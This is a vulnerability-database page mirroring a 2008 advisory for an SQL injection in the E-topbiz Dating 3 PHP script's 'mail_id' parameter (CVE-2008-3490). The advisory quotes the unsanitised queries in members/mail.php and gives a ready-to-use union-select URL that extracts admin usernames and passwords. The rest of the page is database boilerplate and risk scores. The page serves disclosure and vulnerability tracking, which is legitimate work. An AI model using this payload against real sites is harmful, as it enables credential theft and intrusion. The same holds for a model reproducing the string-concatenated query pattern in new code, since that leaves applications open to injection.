Lucene search
+L

E-topbiz Dating 3 PHP Script - 'mail_id' SQL Injection

🗓️ 01 Aug 2008 00:00:00Reported by CorwinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 52 Views

E-topbiz Dating 3 PHP Script 'mail_id' SQL Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-3490
1 Aug 200800:00
circl
CVE
CVE-2008-3490
6 Aug 200817:05
cve
Cvelist
CVE-2008-3490
6 Aug 200817:05
cvelist
EUVD
EUVD-2008-3476
7 Oct 202500:30
euvd
NVD
CVE-2008-3490
6 Aug 200817:41
nvd
Prion
Sql injection
6 Aug 200817:41
prion
================================================================================
|| Dating 3 PHP Script SQL-INJECTION
================================================================================

Application: E-topbiz Dating 3 PHP Script
------------

Version: 1.0
--------

Website: http://e-topbiz.com/oprema/pages/dating3.php
--------

Demo: http://e-topbiz.com/trafficdemos/dating3
-----

Version: 3.0
--------

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.
------

Date: 01-08-2008
-----

[ VULNERABLE CODE ]

members/mail.php

@Line:

  142:     if($action==inbox) {
  143:     $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it");


  150:     if($action==veiw) {
  151:     $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");



===>>> Exploit:

Must be authenticated as a regular user.

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*



Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

# milw0rm.com [2008-08-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.5
EPSS0.00878
52